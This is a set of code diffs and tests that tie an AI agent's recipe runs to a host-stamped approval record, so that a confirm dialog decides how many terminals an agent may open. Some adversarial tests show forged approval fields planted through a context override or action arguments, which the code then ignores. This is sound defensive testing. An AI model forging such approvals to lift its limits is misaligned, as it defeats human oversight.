                 ...(hostApprovedTargets ? { hostApprovedTargets } : {}),
+                ...(approvedRecipeRun ? { hostApprovedRecipeRun: approvedRecipeRun } : {}),
               }),
             actionId
           );

--- a/src/services/ActionService.ts
+++ b/src/services/ActionService.ts
@@ -613,6 +613,11 @@ export class ActionService {
         // deselection needs to know WHICH targets survived it, and the only
         // trustworthy source is the host that raised the dialog (#12123).
         hostApprovedTargets: options?.hostApprovedTargets,
+        // And the recipe half of it (#12263). Same unconditional stamp for the
+        // same reason: this is what tells a recipe run that a human read the
+        // terminals a dialog listed, so an injected `contextOverride` must not
+        // be able to claim an approval that raises the agent terminal cap.
+        hostApprovedRecipeRun: options?.hostApprovedRecipeRun,
       };
       const result = await definition.run(validatedArgs, runContext);
       // Enforce the action's own result contract. Zod objects strip unknown

--- a/src/services/__tests__/ActionService.test.ts
+++ b/src/services/__tests__/ActionService.test.ts
@@ -970,7 +970,11 @@ describe("ActionService", () => {
         expect(mockRun).toHaveBeenCalledWith(
           undefined,
           expect.objectContaining({
-            hostApprovedRecipeRun: { recipeId: "r1", terminalCount: 10, terminalsDigest: "deadbeef" },
+            hostApprovedRecipeRun: {
+              recipeId: "r1",
+              terminalCount: 10,
+              terminalsDigest: "deadbeef",
+            },
           })
         );
       });
@@ -983,7 +987,11 @@ describe("ActionService", () => {
           source: "agent",
           confirmed: true,
           contextOverride: {
-            hostApprovedRecipeRun: { recipeId: "r1", terminalCount: 10, terminalsDigest: "deadbeef" },
+            hostApprovedRecipeRun: {
+              recipeId: "r1",
+              terminalCount: 10,
+              terminalsDigest: "deadbeef",
+            },
           },
         });
 

--- a/src/services/__tests__/ActionService.test.ts
+++ b/src/services/__tests__/ActionService.test.ts
@@ -964,13 +964,13 @@ describe("ActionService", () => {
         await service.dispatch("actions.list", undefined, {
           source: "agent",
           confirmed: true,
-          hostApprovedRecipeRun: { recipeId: "r1", terminalCount: 10 },
+          hostApprovedRecipeRun: { recipeId: "r1", terminalCount: 10, terminalsDigest: "deadbeef" },
         });
 
         expect(mockRun).toHaveBeenCalledWith(
           undefined,
           expect.objectContaining({
-            hostApprovedRecipeRun: { recipeId: "r1", terminalCount: 10 },
+            hostApprovedRecipeRun: { recipeId: "r1", terminalCount: 10, terminalsDigest: "deadbeef" },
           })
         );
       });
@@ -983,7 +983,7 @@ describe("ActionService", () => {
           source: "agent",
           confirmed: true,
           contextOverride: {
-            hostApprovedRecipeRun: { recipeId: "r1", terminalCount: 10 },
+            hostApprovedRecipeRun: { recipeId: "r1", terminalCount: 10, terminalsDigest: "deadbeef" },
           },
         });
 

--- a/src/services/__tests__/ActionService.test.ts
+++ b/src/services/__tests__/ActionService.test.ts
@@ -953,6 +953,47 @@ describe("ActionService", () => {
         );
       });
 
+      // The recipe half (#12263). Same unspoofable terms, and load-bearing for
+      // a different reason: this one decides HOW MANY terminals a run may open,
+      // so a caller able to plant it could hand itself the full ten-pane recipe
+      // the confirm dialog exists to gate.
+      it("stamps ctx.hostApprovedRecipeRun from the dispatch options", async () => {
+        const mockRun = vi.fn().mockResolvedValue(undefined);
+        service.register(confirmAction(mockRun));
+
+        await service.dispatch("actions.list", undefined, {
+          source: "agent",
+          confirmed: true,
+          hostApprovedRecipeRun: { recipeId: "r1", terminalCount: 10 },
+        });
+
+        expect(mockRun).toHaveBeenCalledWith(
+          undefined,
+          expect.objectContaining({
+            hostApprovedRecipeRun: { recipeId: "r1", terminalCount: 10 },
+          })
+        );
+      });
+
+      it("overwrites a contextOverride that claims a recipe approval nobody gave", async () => {
+        const mockRun = vi.fn().mockResolvedValue(undefined);
+        service.register(confirmAction(mockRun));
+
+        const result = await service.dispatch("actions.list", undefined, {
+          source: "agent",
+          confirmed: true,
+          contextOverride: {
+            hostApprovedRecipeRun: { recipeId: "r1", terminalCount: 10 },
+          },
+        });
+
+        expect(result.ok).toBe(true);
+        expect(mockRun).toHaveBeenCalledWith(
+          undefined,
+          expect.objectContaining({ hostApprovedRecipeRun: undefined })
+        );
+      });
+
       it("overwrites a contextOverride that claims per-target approvals nobody gave", async () => {
         const mockRun = vi.fn().mockResolvedValue(undefined);
         service.register(confirmAction(mockRun));

--- a/src/services/actions/__tests__/__snapshots__/actionDefinitions.quality.test.ts.snap
+++ b/src/services/actions/__tests__/__snapshots__/actionDefinitions.quality.test.ts.snap
@@ -4097,7 +4097,7 @@ exports[`ActionService.list() snapshot > produces a stable, sorted manifest snap
     "category": "recipes",
     "danger": "confirm",
     "dangerRationale": "Spawns the recipe's terminals, each running shell commands or launching agents. Agent-initiated runs are confirmation-gated so a single dispatch can't open many terminals unprompted.",
-    "description": "Launch the terminals a saved recipe defines, in one worktree, as a repeatable multi-pane setup. Launch a single agent or a plain terminal instead when only one pane is wanted. This creates several panels at once and starts their configured commands or agents. An automated caller gets at most the first three of them; the rest come back as failures, so check what actually started.",
+    "description": "Launch the terminals a saved recipe defines, in one worktree, as a repeatable multi-pane setup. Launch a single agent or a plain terminal instead when only one pane is wanted. This creates several panels at once and starts their configured commands or agents. Approving its prompt starts every terminal; a pre-authorized call starts at most three, so check what actually started.",
     "examples": undefined,
     "id": "recipe.run",
     "keywords": undefined,

--- a/src/services/actions/definitions/__tests__/recipeActions.adversarial.test.ts
+++ b/src/services/actions/definitions/__tests__/recipeActions.adversarial.test.ts
@@ -194,7 +194,7 @@ describe("recipeActions adversarial", () => {
       {
         dispatchSource: "agent",
         projectPath: "/repo",
-        hostApprovedRecipeRun: { recipeId: "r1", terminalCount: 7 },
+        hostApprovedRecipeRun: { recipeId: "r1", terminalCount: 7, terminalsDigest: "deadbeef" },
       }
     );
 
@@ -205,15 +205,17 @@ describe("recipeActions adversarial", () => {
       expect.any(Object),
       expect.objectContaining({
         dispatchSource: "agent",
-        hostApprovedRecipeRun: { recipeId: "r1", terminalCount: 7 },
+        hostApprovedRecipeRun: { recipeId: "r1", terminalCount: 7, terminalsDigest: "deadbeef" },
       })
     );
   });
 
   it("recipe.run reads the approval only from ctx, never from its own args", async () => {
     // hostApprovedRecipeRun is deliberately absent from recipe.run's argsSchema:
-    // published there, a model could name its own approval. Zod strips it, so
-    // what reaches the store is the context stamp — here, nothing.
+    // published there, a model could name its own approval. This calls run()
+    // with the forged field already past any parsing, so it proves the stronger
+    // property — the handler never reads its args for authority, whatever the
+    // schema does. The schema's own silence is asserted separately below.
     const runRecipeWithResults = vi.fn().mockResolvedValue(OK_SPAWN_RESULTS);
     setRecipeState({ runRecipeWithResults });
     setWorktreeMap(new Map([["wt-1", { path: "/repo/wt", branch: "feat/x" }]]));
@@ -231,6 +233,18 @@ describe("recipeActions adversarial", () => {
 
     const options = runRecipeWithResults.mock.calls[0]?.[4] as Record<string, unknown>;
     expect(options.hostApprovedRecipeRun).toBeUndefined();
+  });
+
+  it("recipe.run never advertises the approval on its published arg schema", () => {
+    // The other half: even if run() were rewritten to read its args, the field
+    // a model could name has to not exist. Zod strips what it does not declare.
+    const parsed = definitionFor("recipe.run").argsSchema?.parse({
+      recipeId: "r1",
+      hostApprovedRecipeRun: { recipeId: "r1", terminalCount: 10, terminalsDigest: "deadbeef" },
+    }) as Record<string, unknown>;
+
+    expect(parsed.recipeId).toBe("r1");
+    expect("hostApprovedRecipeRun" in parsed).toBe(false);
   });
 
   it("recipe.run falls back to ctx.projectPath when the target worktree is missing from the view store", async () => {

--- a/src/services/actions/definitions/__tests__/recipeActions.adversarial.test.ts
+++ b/src/services/actions/definitions/__tests__/recipeActions.adversarial.test.ts
@@ -179,6 +179,60 @@ describe("recipeActions adversarial", () => {
     );
   });
 
+  it("recipe.run threads ctx.hostApprovedRecipeRun into the run options (#12263)", async () => {
+    // The cap and the approval that sizes it are two separate stamps, and a
+    // launch path that forwards one but not the other previews terminals it
+    // then refuses to start — the failure class #10110 already caught once.
+    const runRecipeWithResults = vi.fn().mockResolvedValue(OK_SPAWN_RESULTS);
+    setRecipeState({ runRecipeWithResults });
+    setWorktreeMap(new Map([["wt-1", { path: "/repo/wt", branch: "feat/x" }]]));
+
+    const run = setupActions();
+    await run(
+      "recipe.run",
+      { recipeId: "r1", worktreeId: "wt-1" },
+      {
+        dispatchSource: "agent",
+        projectPath: "/repo",
+        hostApprovedRecipeRun: { recipeId: "r1", terminalCount: 7 },
+      }
+    );
+
+    expect(runRecipeWithResults).toHaveBeenCalledWith(
+      "r1",
+      "/repo/wt",
+      "wt-1",
+      expect.any(Object),
+      expect.objectContaining({
+        dispatchSource: "agent",
+        hostApprovedRecipeRun: { recipeId: "r1", terminalCount: 7 },
+      })
+    );
+  });
+
+  it("recipe.run reads the approval only from ctx, never from its own args", async () => {
+    // hostApprovedRecipeRun is deliberately absent from recipe.run's argsSchema:
+    // published there, a model could name its own approval. Zod strips it, so
+    // what reaches the store is the context stamp — here, nothing.
+    const runRecipeWithResults = vi.fn().mockResolvedValue(OK_SPAWN_RESULTS);
+    setRecipeState({ runRecipeWithResults });
+    setWorktreeMap(new Map([["wt-1", { path: "/repo/wt", branch: "feat/x" }]]));
+
+    const run = setupActions();
+    await run(
+      "recipe.run",
+      {
+        recipeId: "r1",
+        worktreeId: "wt-1",
+        hostApprovedRecipeRun: { recipeId: "r1", terminalCount: 10 },
+      } as never,
+      { dispatchSource: "agent", projectPath: "/repo" }
+    );
+
+    const options = runRecipeWithResults.mock.calls[0]?.[4] as Record<string, unknown>;
+    expect(options.hostApprovedRecipeRun).toBeUndefined();
+  });
+
   it("recipe.run falls back to ctx.projectPath when the target worktree is missing from the view store", async () => {
     const runRecipeWithResults = vi.fn().mockResolvedValue(OK_SPAWN_RESULTS);
     setRecipeState({ runRecipeWithResults });

--- a/src/services/actions/definitions/__tests__/workflowActions.adversarial.test.ts
+++ b/src/services/actions/definitions/__tests__/workflowActions.adversarial.test.ts
@@ -636,7 +636,11 @@ describe("worktree.createWithRecipe", () => {
 
     await def.run({ source: newBranch("feature/foo"), recipeId: "recipe-1" }, {
       dispatchSource: "agent",
-      hostApprovedRecipeRun: { recipeId: "recipe-1", terminalCount: 6, terminalsDigest: "deadbeef" },
+      hostApprovedRecipeRun: {
+        recipeId: "recipe-1",
+        terminalCount: 6,
+        terminalsDigest: "deadbeef",
+      },
     } as never);
 
     expect(runRecipeWithResults).toHaveBeenCalledWith(
@@ -646,7 +650,11 @@ describe("worktree.createWithRecipe", () => {
       expect.any(Object),
       expect.objectContaining({
         dispatchSource: "agent",
-        hostApprovedRecipeRun: { recipeId: "recipe-1", terminalCount: 6, terminalsDigest: "deadbeef" },
+        hostApprovedRecipeRun: {
+          recipeId: "recipe-1",
+          terminalCount: 6,
+          terminalsDigest: "deadbeef",
+        },
       })
     );
   });
@@ -959,7 +967,11 @@ describe("workflow recipe-spawn plugin guard (issue #10582)", () => {
       {
         source: "agent",
         confirmed: true,
-        hostApprovedRecipeRun: { recipeId: "recipe-1", terminalCount: 8, terminalsDigest: "deadbeef" },
+        hostApprovedRecipeRun: {
+          recipeId: "recipe-1",
+          terminalCount: 8,
+          terminalsDigest: "deadbeef",
+        },
       }
     );
     expect(approved.ok).toBe(true);

--- a/src/services/actions/definitions/__tests__/workflowActions.adversarial.test.ts
+++ b/src/services/actions/definitions/__tests__/workflowActions.adversarial.test.ts
@@ -636,7 +636,7 @@ describe("worktree.createWithRecipe", () => {
 
     await def.run({ source: newBranch("feature/foo"), recipeId: "recipe-1" }, {
       dispatchSource: "agent",
-      hostApprovedRecipeRun: { recipeId: "recipe-1", terminalCount: 6 },
+      hostApprovedRecipeRun: { recipeId: "recipe-1", terminalCount: 6, terminalsDigest: "deadbeef" },
     } as never);
 
     expect(runRecipeWithResults).toHaveBeenCalledWith(
@@ -646,7 +646,7 @@ describe("worktree.createWithRecipe", () => {
       expect.any(Object),
       expect.objectContaining({
         dispatchSource: "agent",
-        hostApprovedRecipeRun: { recipeId: "recipe-1", terminalCount: 6 },
+        hostApprovedRecipeRun: { recipeId: "recipe-1", terminalCount: 6, terminalsDigest: "deadbeef" },
       })
     );
   });
@@ -959,13 +959,13 @@ describe("workflow recipe-spawn plugin guard (issue #10582)", () => {
       {
         source: "agent",
         confirmed: true,
-        hostApprovedRecipeRun: { recipeId: "recipe-1", terminalCount: 8 },
+        hostApprovedRecipeRun: { recipeId: "recipe-1", terminalCount: 8, terminalsDigest: "deadbeef" },
       }
     );
     expect(approved.ok).toBe(true);
     expect(
       (runRecipeWithResults.mock.calls[1]?.[4] as Record<string, unknown>).hostApprovedRecipeRun
-    ).toEqual({ recipeId: "recipe-1", terminalCount: 8 });
+    ).toEqual({ recipeId: "recipe-1", terminalCount: 8, terminalsDigest: "deadbeef" });
   });
 });
 

--- a/src/services/actions/definitions/__tests__/workflowActions.adversarial.test.ts
+++ b/src/services/actions/definitions/__tests__/workflowActions.adversarial.test.ts
@@ -627,6 +627,30 @@ describe("worktree.createWithRecipe", () => {
     );
   });
 
+  it("forwards ctx.hostApprovedRecipeRun so an approval covers the whole recipe (#12263)", async () => {
+    // This composite previews the recipe through the same formatter recipe.run
+    // does, so the dialog lists every terminal. Forwarding dispatchSource alone
+    // would leave it starting three of them.
+    const runRecipeWithResults = setRecipe("recipe-1");
+    const def = setupActions(makeCallbacks())("worktree.createWithRecipe");
+
+    await def.run({ source: newBranch("feature/foo"), recipeId: "recipe-1" }, {
+      dispatchSource: "agent",
+      hostApprovedRecipeRun: { recipeId: "recipe-1", terminalCount: 6 },
+    } as never);
+
+    expect(runRecipeWithResults).toHaveBeenCalledWith(
+      "recipe-1",
+      expect.any(String),
+      "wt-new",
+      expect.any(Object),
+      expect.objectContaining({
+        dispatchSource: "agent",
+        hostApprovedRecipeRun: { recipeId: "recipe-1", terminalCount: 6 },
+      })
+    );
+  });
+
   it("recipe failure after worktree creation throws PARTIAL_SUCCESS with worktree info", async () => {
     setRecipe("recipe-1", async () => {
       throw new Error("recipe boom");
@@ -904,6 +928,44 @@ describe("workflow recipe-spawn plugin guard (issue #10582)", () => {
       expect.any(Object),
       expect.objectContaining({ dispatchSource: "agent" })
     );
+  });
+
+  it("workflow.startWorkOnIssue: a bare approval carries no recipe scope, a host one does (#12263)", async () => {
+    // End-to-end through the real ActionService, which is where the stamp
+    // lives. `confirmed: true` alone is a standing grant — no dialog, nobody
+    // shown anything — so nothing raises the cap. The same dispatch carrying
+    // the host's record of what a dialog listed does.
+    forgeClientMock.getIssue.mockResolvedValue({
+      number: 6609,
+      title: "Add workflow macro tools",
+      url: "https://github.com/x/y/issues/6609",
+    });
+    const runRecipeWithResults = setRecipe("recipe-1");
+    const service = registerThroughActionService(makeCallbacks());
+
+    const granted = await service.dispatch(
+      "workflow.startWorkOnIssue" as ActionId,
+      { issueNumber: 6609, agentId: "claude", recipeId: "recipe-1" },
+      { source: "agent", confirmed: true }
+    );
+    expect(granted.ok).toBe(true);
+    expect(
+      (runRecipeWithResults.mock.calls[0]?.[4] as Record<string, unknown>).hostApprovedRecipeRun
+    ).toBeUndefined();
+
+    const approved = await service.dispatch(
+      "workflow.startWorkOnIssue" as ActionId,
+      { issueNumber: 6609, agentId: "claude", recipeId: "recipe-1" },
+      {
+        source: "agent",
+        confirmed: true,
+        hostApprovedRecipeRun: { recipeId: "recipe-1", terminalCount: 8 },
+      }
+    );
+    expect(approved.ok).toBe(true);
+    expect(
+      (runRecipeWithResults.mock.calls[1]?.[4] as Record<string, unknown>).hostApprovedRecipeRun
+    ).toEqual({ recipeId: "recipe-1", terminalCount: 8 });
   });
 });
 

--- a/src/services/actions/definitions/recipeActions.ts
+++ b/src/services/actions/definitions/recipeActions.ts
@@ -178,7 +178,7 @@ export function registerRecipeActions(actions: ActionRegistry, _callbacks: Actio
       id: "recipe.run",
       title: "Run Recipe",
       description:
-        "Launch the terminals a saved recipe defines, in one worktree, as a repeatable multi-pane setup. Launch a single agent or a plain terminal instead when only one pane is wanted. This creates several panels at once and starts their configured commands or agents. An automated caller gets at most the first three of them; the rest come back as failures, so check what actually started.",
+        "Launch the terminals a saved recipe defines, in one worktree, as a repeatable multi-pane setup. Launch a single agent or a plain terminal instead when only one pane is wanted. This creates several panels at once and starts their configured commands or agents. Approving its prompt starts every terminal; a pre-authorized call starts at most three, so check what actually started.",
       category: "recipes",
       kind: "command",
       danger: "confirm",
@@ -236,8 +236,10 @@ export function registerRecipeActions(actions: ActionRegistry, _callbacks: Actio
           branchName: worktree?.branch,
         };
         // Always forward dispatchSource so runRecipeWithResults can apply the
-        // agent-source terminal cap. ActionService sets ctx.dispatchSource on
-        // every dispatch, so this is the live path for all real invocations.
+        // agent-source terminal cap, and the host's record of what an approver
+        // was shown so the cap is sized to that rather than to the unapproved
+        // floor (#12263). Both are stamped by ActionService on every dispatch,
+        // so this is the live path for all real invocations.
         const recipeName = useRecipeStore.getState().getRecipeById(recipeId)?.name;
         const results = await useRecipeStore
           .getState()
@@ -245,6 +247,7 @@ export function registerRecipeActions(actions: ActionRegistry, _callbacks: Actio
             spawnedBy,
             focusPolicy,
             dispatchSource: ctx.dispatchSource,
+            hostApprovedRecipeRun: ctx.hostApprovedRecipeRun,
           });
 
         // Toast/inbox first so palette users see the failure even though the

--- a/src/services/actions/definitions/workflowCreationActions.ts
+++ b/src/services/actions/definitions/workflowCreationActions.ts
@@ -374,13 +374,18 @@ export function registerWorkflowCreationActions(
             };
             // Forward dispatchSource so runRecipeWithResults applies the
             // agent-source terminal cap to MCP-driven worktree+recipe combos,
-            // matching recipe.run.
+            // and hostApprovedRecipeRun so an approval covers every terminal
+            // the dialog listed — both matching recipe.run. This composite's
+            // confirm dialog previews the same recipe through the same
+            // formatter, so omitting the second would preview terminals it then
+            // refused to start (#12263).
             const results = await useRecipeStore
               .getState()
               .runRecipeWithResults(recipeId, path, worktreeId, recipeContext, {
                 spawnedBy,
                 focusPolicy,
                 dispatchSource: ctx.dispatchSource,
+                hostApprovedRecipeRun: ctx.hostApprovedRecipeRun,
               });
             // "Launched" means at least one terminal actually spawned — a run
             // where every terminal was dropped (e.g. panel limit) must not
@@ -644,13 +649,18 @@ export function registerWorkflowCreationActions(
             };
             // Forward dispatchSource so runRecipeWithResults applies the
             // agent-source terminal cap to MCP-driven worktree+recipe combos,
-            // matching recipe.run.
+            // and hostApprovedRecipeRun so an approval covers every terminal
+            // the dialog listed — both matching recipe.run. This composite's
+            // confirm dialog previews the same recipe through the same
+            // formatter, so omitting the second would preview terminals it then
+            // refused to start (#12263).
             const results = await useRecipeStore
               .getState()
               .runRecipeWithResults(recipeId, worktreePath, worktreeId, recipeContext, {
                 spawnedBy,
                 focusPolicy,
                 dispatchSource: ctx.dispatchSource,
+                hostApprovedRecipeRun: ctx.hostApprovedRecipeRun,
               });
             // "Launched" means at least one terminal actually spawned — a run
             // where every terminal was dropped (e.g. panel limit) must not

--- a/src/store/__tests__/recipeStore.test.ts
+++ b/src/store/__tests__/recipeStore.test.ts
@@ -151,6 +151,22 @@ import { useRecipeStore } from "../recipeStore";
 import { usePanelLimitStore } from "../panelLimitStore";
 import type { RecipeTerminal } from "@shared/types/project";
 
+/** A ten-terminal recipe — the shape the agent terminal cap is measured against. */
+function tenTerminalRecipe() {
+  return {
+    id: "recipe-1",
+    name: "Ten Terminals",
+    projectId: "project-1",
+    terminals: Array.from({ length: 10 }, (_, i) => ({
+      type: "terminal" as const,
+      title: `Shell ${i}`,
+      command: "echo",
+      env: {},
+    })),
+    createdAt: Date.now(),
+  };
+}
+
 describe("recipeStore", () => {
   beforeEach(() => {
     vi.clearAllMocks();
@@ -1304,7 +1320,7 @@ describe("recipeStore", () => {
       }
     });
 
-    it("caps an agent-dispatched run at MAX_AGENT_RECIPE_TERMINALS and never prompts", async () => {
+    it("caps an agent-dispatched run with no host approval behind it", async () => {
       const requestConfirmationSpy = vi.fn().mockResolvedValue(true);
       const previousRequestConfirmation = usePanelLimitStore.getState().requestConfirmation;
       usePanelLimitStore.setState({ requestConfirmation: requestConfirmationSpy });
@@ -1313,20 +1329,7 @@ describe("recipeStore", () => {
         addTerminalMock.mockImplementation(() => Promise.resolve(`terminal-${++callIndex}`));
 
         useRecipeStore.setState({
-          recipes: [
-            {
-              id: "recipe-1",
-              name: "Ten Terminals",
-              projectId: "project-1",
-              terminals: Array.from({ length: 10 }, (_, i) => ({
-                type: "terminal" as const,
-                title: `Shell ${i}`,
-                command: "echo",
-                env: {},
-              })),
-              createdAt: Date.now(),
-            },
-          ],
+          recipes: [tenTerminalRecipe()],
           isLoading: false,
           currentProjectId: "project-1",
         });
@@ -1344,9 +1347,151 @@ describe("recipeStore", () => {
         expect(results.failed.every((f) => f.error === "Agent recipe terminal cap reached")).toBe(
           true
         );
-        // Cap runs before preflightSpawnBatchLimit, so the projected count never
-        // crosses the confirm threshold — a headless agent dispatch can't hang.
+        // No prompt HERE only because nothing else is open: the ambient panel
+        // count is empty in this suite, so 0 + 3 stays under the confirm
+        // threshold. Deliberately not stated as a property of the cap — see the
+        // 18-ambient-panel case below, which is the same capped run prompting.
         expect(requestConfirmationSpy).not.toHaveBeenCalled();
+      } finally {
+        usePanelLimitStore.setState({ requestConfirmation: previousRequestConfirmation });
+      }
+    });
+
+    it("starts every terminal a host approval covered (#12263)", async () => {
+      let callIndex = 0;
+      addTerminalMock.mockImplementation(() => Promise.resolve(`terminal-${++callIndex}`));
+
+      useRecipeStore.setState({
+        recipes: [tenTerminalRecipe()],
+        isLoading: false,
+        currentProjectId: "project-1",
+      });
+
+      const results = await useRecipeStore
+        .getState()
+        .runRecipeWithResults("recipe-1", "/tmp/worktree", "worktree-1", undefined, {
+          dispatchSource: "agent",
+          hostApprovedRecipeRun: { recipeId: "recipe-1", terminalCount: 10 },
+        });
+
+      expect(addTerminalMock).toHaveBeenCalledTimes(10);
+      expect(results.spawned).toHaveLength(10);
+      expect(results.failed).toHaveLength(0);
+    });
+
+    it("grants only the count the approver was shown, not the recipe's current size", async () => {
+      // The dialog previewed a four-terminal recipe; by the time the run lands
+      // the recipe has ten. The approval covers what was on screen, so the six
+      // terminals nobody was offered come back as failures.
+      let callIndex = 0;
+      addTerminalMock.mockImplementation(() => Promise.resolve(`terminal-${++callIndex}`));
+
+      useRecipeStore.setState({
+        recipes: [tenTerminalRecipe()],
+        isLoading: false,
+        currentProjectId: "project-1",
+      });
+
+      const results = await useRecipeStore
+        .getState()
+        .runRecipeWithResults("recipe-1", "/tmp/worktree", "worktree-1", undefined, {
+          dispatchSource: "agent",
+          hostApprovedRecipeRun: { recipeId: "recipe-1", terminalCount: 4 },
+        });
+
+      expect(addTerminalMock).toHaveBeenCalledTimes(4);
+      expect(results.spawned).toHaveLength(4);
+      expect(results.failed.map((f) => f.index)).toEqual([4, 5, 6, 7, 8, 9]);
+    });
+
+    it("falls back to the unapproved cap when the approval names another recipe", async () => {
+      // getRecipeById follows shadowing (#8725), so the recipe that runs can
+      // differ from the one previewed. An approval for a different id grants
+      // nothing extra — and falls back rather than failing, so a shadowing race
+      // behaves exactly like an unapproved run.
+      let callIndex = 0;
+      addTerminalMock.mockImplementation(() => Promise.resolve(`terminal-${++callIndex}`));
+
+      useRecipeStore.setState({
+        recipes: [tenTerminalRecipe()],
+        isLoading: false,
+        currentProjectId: "project-1",
+      });
+
+      const results = await useRecipeStore
+        .getState()
+        .runRecipeWithResults("recipe-1", "/tmp/worktree", "worktree-1", undefined, {
+          dispatchSource: "agent",
+          hostApprovedRecipeRun: { recipeId: "some-other-recipe", terminalCount: 10 },
+        });
+
+      expect(addTerminalMock).toHaveBeenCalledTimes(3);
+      expect(results.spawned).toHaveLength(3);
+      expect(results.failed).toHaveLength(7);
+      expect(results.failed.every((f) => f.error === "Agent recipe terminal cap reached")).toBe(
+        true
+      );
+    });
+
+    it("does not lift the cap for an approval carrying no agent dispatch source", async () => {
+      // The two halves are independent: the cap keys on dispatchSource, and the
+      // approval only sizes it. A user run was never capped and must not start
+      // reading an approval record to decide how many terminals it may open.
+      let callIndex = 0;
+      addTerminalMock.mockImplementation(() => Promise.resolve(`terminal-${++callIndex}`));
+
+      useRecipeStore.setState({
+        recipes: [tenTerminalRecipe()],
+        isLoading: false,
+        currentProjectId: "project-1",
+      });
+
+      const results = await useRecipeStore
+        .getState()
+        .runRecipeWithResults("recipe-1", "/tmp/worktree", "worktree-1", undefined, {
+          dispatchSource: "user",
+          hostApprovedRecipeRun: { recipeId: "recipe-1", terminalCount: 2 },
+        });
+
+      expect(addTerminalMock).toHaveBeenCalledTimes(10);
+      expect(results.failed).toHaveLength(0);
+    });
+
+    it("still reaches the panel-limit prompt when the ambient count is high (#12263)", async () => {
+      // Pins the defect the removed comment denied. The agent cap bounds the
+      // BATCH, never `currentCount` — the workspace's ambient panel count —
+      // so preflightSpawnBatchLimit prompts on 18 + 3 = 21 > 20 for a run the
+      // cap has already trimmed to three. Left unfixed on purpose: it is a
+      // separate defect from the cap, and this test is here so the next reader
+      // finds the behaviour instead of the old claim that it cannot happen.
+      const requestConfirmationSpy = vi.fn().mockResolvedValue(true);
+      const previousRequestConfirmation = usePanelLimitStore.getState().requestConfirmation;
+      usePanelLimitStore.setState({ requestConfirmation: requestConfirmationSpy });
+      try {
+        let callIndex = 0;
+        addTerminalMock.mockImplementation(() => Promise.resolve(`terminal-${++callIndex}`));
+
+        const ambientIds = Array.from({ length: 18 }, (_, i) => `ambient-${i}`);
+        panelStoreState.panelIds = ambientIds;
+        panelStoreState.panelsById = Object.fromEntries(
+          ambientIds.map((id) => [id, { location: "grid" }])
+        );
+
+        useRecipeStore.setState({
+          recipes: [tenTerminalRecipe()],
+          isLoading: false,
+          currentProjectId: "project-1",
+        });
+
+        const results = await useRecipeStore
+          .getState()
+          .runRecipeWithResults("recipe-1", "/tmp/worktree", "worktree-1", undefined, {
+            dispatchSource: "agent",
+          });
+
+        // The cap trimmed the batch to three, and the prompt fired anyway.
+        expect(requestConfirmationSpy).toHaveBeenCalledWith(21, null);
+        expect(results.spawned).toHaveLength(3);
       } finally {
         usePanelLimitStore.setState({ requestConfirmation: previousRequestConfirmation });
       }
@@ -1391,20 +1536,7 @@ describe("recipeStore", () => {
       addTerminalMock.mockImplementation(() => Promise.resolve(`terminal-${++callIndex}`));
 
       useRecipeStore.setState({
-        recipes: [
-          {
-            id: "recipe-1",
-            name: "Ten Terminals",
-            projectId: "project-1",
-            terminals: Array.from({ length: 10 }, (_, i) => ({
-              type: "terminal" as const,
-              title: `Shell ${i}`,
-              command: "echo",
-              env: {},
-            })),
-            createdAt: Date.now(),
-          },
-        ],
+        recipes: [tenTerminalRecipe()],
         isLoading: false,
         currentProjectId: "project-1",
       });

--- a/src/store/__tests__/recipeStore.test.ts
+++ b/src/store/__tests__/recipeStore.test.ts
@@ -1391,8 +1391,10 @@ describe("recipeStore", () => {
     });
 
     it("grants only the count the approver was shown, not the recipe's current size", async () => {
-      // The dialog previewed four terminals; the approval covers what was on
-      // screen, so the six nobody was offered come back as failures.
+      // A count below the recipe's own size is honoured as the ceiling: the six
+      // beyond it come back as failures rather than starting. Not a growth
+      // scenario — a recipe that actually grew after the preview moves its
+      // digest, which is the case two tests below.
       let callIndex = 0;
       addTerminalMock.mockImplementation(() => Promise.resolve(`terminal-${++callIndex}`));
 

--- a/src/store/__tests__/recipeStore.test.ts
+++ b/src/store/__tests__/recipeStore.test.ts
@@ -150,6 +150,16 @@ const runHistoryAppendMock = vi.fn().mockResolvedValue(undefined);
 import { useRecipeStore } from "../recipeStore";
 import { usePanelLimitStore } from "../panelLimitStore";
 import type { RecipeTerminal } from "@shared/types/project";
+import { recipeApprovalDigest } from "@/utils/recipeApprovalDigest";
+
+/** A host approval that genuinely covers `recipe`, as the bridge would issue it. */
+function approvalFor(recipe: { id: string; terminals: RecipeTerminal[] }, terminalCount?: number) {
+  return {
+    recipeId: recipe.id,
+    terminalCount: terminalCount ?? recipe.terminals.length,
+    terminalsDigest: recipeApprovalDigest(recipe.terminals),
+  };
+}
 
 /** A ten-terminal recipe — the shape the agent terminal cap is measured against. */
 function tenTerminalRecipe() {
@@ -1361,8 +1371,9 @@ describe("recipeStore", () => {
       let callIndex = 0;
       addTerminalMock.mockImplementation(() => Promise.resolve(`terminal-${++callIndex}`));
 
+      const recipe = tenTerminalRecipe();
       useRecipeStore.setState({
-        recipes: [tenTerminalRecipe()],
+        recipes: [recipe],
         isLoading: false,
         currentProjectId: "project-1",
       });
@@ -1371,7 +1382,7 @@ describe("recipeStore", () => {
         .getState()
         .runRecipeWithResults("recipe-1", "/tmp/worktree", "worktree-1", undefined, {
           dispatchSource: "agent",
-          hostApprovedRecipeRun: { recipeId: "recipe-1", terminalCount: 10 },
+          hostApprovedRecipeRun: approvalFor(recipe),
         });
 
       expect(addTerminalMock).toHaveBeenCalledTimes(10);
@@ -1380,14 +1391,14 @@ describe("recipeStore", () => {
     });
 
     it("grants only the count the approver was shown, not the recipe's current size", async () => {
-      // The dialog previewed a four-terminal recipe; by the time the run lands
-      // the recipe has ten. The approval covers what was on screen, so the six
-      // terminals nobody was offered come back as failures.
+      // The dialog previewed four terminals; the approval covers what was on
+      // screen, so the six nobody was offered come back as failures.
       let callIndex = 0;
       addTerminalMock.mockImplementation(() => Promise.resolve(`terminal-${++callIndex}`));
 
+      const recipe = tenTerminalRecipe();
       useRecipeStore.setState({
-        recipes: [tenTerminalRecipe()],
+        recipes: [recipe],
         isLoading: false,
         currentProjectId: "project-1",
       });
@@ -1396,24 +1407,25 @@ describe("recipeStore", () => {
         .getState()
         .runRecipeWithResults("recipe-1", "/tmp/worktree", "worktree-1", undefined, {
           dispatchSource: "agent",
-          hostApprovedRecipeRun: { recipeId: "recipe-1", terminalCount: 4 },
+          hostApprovedRecipeRun: approvalFor(recipe, 4),
         });
 
       expect(addTerminalMock).toHaveBeenCalledTimes(4);
       expect(results.spawned).toHaveLength(4);
